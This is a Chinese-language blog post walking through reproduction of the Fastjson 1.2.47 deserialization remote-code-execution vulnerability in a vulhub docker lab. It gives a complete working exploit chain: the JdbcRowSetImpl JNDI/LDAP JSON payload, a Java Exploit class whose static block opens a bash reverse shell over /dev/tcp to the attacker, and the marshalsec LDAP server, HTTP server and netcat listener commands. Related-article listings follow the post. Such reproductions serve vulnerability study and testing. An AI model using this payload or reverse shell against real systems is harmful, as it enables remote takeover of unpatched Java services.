fastjson1.2.47反序列化漏洞复现

最新推荐文章于 2024-08-09 20:21:52 发布
最新推荐文章于 2024-08-09 20:21:52 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/106292301
版权

fastjson1.2.47反序列化漏洞复现

环境搭建

启动docker

systemctl start docker

下载环境

git clone https://github.com/vulhub/vulhub.git

生成docker环境

cd vulhub/fastjson/1.2.47-rce/
docker-compose up -d
docker ps

查看到docker容器运行

漏洞检测

区分 Fastjson 和 Jackson

{"name":"S", "age":21}

{"name":"S", "age":21,"agsbdkjada__ss_d":123}

这两个fastjson都不会报错,而jackson会报错,因为Jackson 因为强制 key 与 javabean 属性对齐,只能少不能多 key,所以会报错。

漏洞复现

kali下切换java版本

update-alternatives  --config  java
java -version
update-alternatives  --config  javac
javac -version

maven编译

git clone --depth=1 https://github.com.cnpmjs.org/mbechler/marshalsec.git
cd marshalsec/
mvn clean package -DskipTests
cd target/

kali监听测试外联

ifconfig
nc -lvvp 7777

在burp中把json数据包替换,其中的ip替换为kali的ip

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}

在这里插入图片描述

编译Exploit.java

ip端口要做修改成kali的

import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

javac Exploit.java

准备LDAP服务和Web服务

ip修改为本地ip

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit
python3 -m http.server 80 或者 python -m SimpleHTTPServer 80

监听shell

nc -lvvp 2345

发送数据包

ip修改为kali的ip之后用burp发送

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}

在这里插入图片描述

参考文章

https://blog.spoock.com/2018/11/07/java-reverse-shell/
https://www.cnblogs.com/escape-w/p/11322845.html
https://github.com/CaijiOrz/fastjson-1.2.47-RCE

whojoe
关注
专栏目录
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3413
Fastjson 1.2.47反序列化漏洞复现
FastJson反序列化漏洞复现附带多个版本的payload
qq_41187177的博客
09-03 4313
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
Fastjson1.2.47反序列化漏洞复现
thelostworld
05-12 593
一、漏洞描述Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意
Fastjson反序列化漏洞
最新发布
qq_50296568的博客
08-09 1168
使用恶意MySQL的url作为参数创建一个com.mysql.cj.jdbc.admin.MiniAdmin对象可以通过MySQL的JDBC驱动的com.mysql.cj.jdbc.admin.MiniAdmin类创建一个指定url的JDBC连接。再通过LOAD DATA LOCAL INFILE语句读取任意文件。只要用户期望类继承自 Throwable 类,Fastjson便会将该类信任,从而造成只要是继承Throwable的任意类都可以被反序列化。生成恶意mysql文件后,
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1345
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
fastjson反序列化漏洞复现
Hanko的专栏
04-19 1074
00前言 fastjson是阿里的开源JSON解析库,被爆出两个远程命令执行漏洞,为2017年1.2.24版本和2019年1.2.47版本。 01环境准备 使用vulhub上的环境,在github上的vulhub下载下来,进入fastjson漏洞环境目录,执行以下命令。 然后访问http://ip:8090看见json返回数据,说明环境启动成功。 还需要开启一个rmi server,用来加载远程恶意类。rmi代码如下 import com.sun.jndi.rmi.registry.R
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2215
Fastjson反序列化漏洞复现
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6375
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
2. **安全编码实践**:在开发过程中遵循安全编码原则,避免直接将不受信任的输入数据反序列化为可执行对象。 3. **安全测试**:在项目上线前进行安全测试,包括但不限于渗透测试,查找并修复潜在的安全问题。 4. **...
Fastjson反序列化漏洞复现分析
include_voidmain的博客
03-25 5491
0x01 反序列化过程 fastjson将字符串转换为对象的方法主要有parse和parseObject 其中parseObject也会调用parse来解析json,下面来分析下反序列化过程 首先写一个测试的javabean public class TestBean { public String isMessage; public String message; public int id; public String getMessage() { System.out.println("getMess
漏洞复现Fastjson反序列化
网络安全知识分享
12-31 5904
Fastjson反序列化一、简介二、序列化与反序列化三、Fastjson漏洞介绍1、漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1、fastjson<=1.2.241.1、TemplatesImpl 利用链分析1.2、JNDI利用链分析1.3、JNDI利用1.4、官方进行的修复2、fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
fastjson-1.2.66版 2020年最新发布,继续加固安全
03-13
fastjson 1.2.66 已发布,这又是一个维护版本,修复了一些 BUG,并且做安全加固,补充了 AutoType 黑名单。 Issues 修复某些场景下BeanToArray报错的问题 修复某些场景多版本共存导致的的兼容问题 修复JSONArray构造方法中,由null List会引发的NPE问题 修复大对象某些场景会报错的问题 #2779 修复字符串自动转换为数值时,小数点后全零报错的问题 #2838 修复某些场景下不识别Kotlin泛型的问题 修复开始SupportNonPublicField特性后JSONField配置name不支持private字段的问题 #2866 修复纳秒级 Timestamp 解析异常问题 #2894 日期自动识别增强对纳秒时间的支持的 支持对Queue类型的反序列化 修复JSONField 在LocalDateTime类型时 format 不生效问题 修复JSONValidator有些场景不能识别非法JSON数据的问题 #3017 加强安全防护
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 437
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 770
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
08-23 1777
Fastjson反序列化漏洞复现(实战案例)
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 3万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
菜鸡一枚(勿喷)复现Fastjson「=1.2.47反序列化漏洞
S_yd1的博客
07-09 635
0x00 前言 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。对版本小于1.2.48的版本通杀,autoType为关闭状态也可使用。 loadClass中默认cache设置为true,利用分为2步执行,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.JdbcRowSetImpl
Fastjson再曝反序列化漏洞,网友:Bugson又来了!
程序猿DD
05-25 319
近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致反序列化漏洞漏洞描述Fastjson 是阿里巴巴开源的 Java 对象和 JSON 格式字符串的快速转换的工具库。Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 au...
fastjson =< 1.2.47 反序列化漏洞浅析
weixin_30341745的博客
07-12 242
fastjson =< 1.2.47 反序列化漏洞浅析 iiusky洛米唯熊今天 文章出处: https://www.03sec.com/3240.shtmlhttps://www.secquan.org/ 圈子社区牛逼!!! 作者:iiusky #poc {"name":{"@type":"java.lang.Class","val":"com.sun...
fastjson反序列化漏洞复现过程
04-19
下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值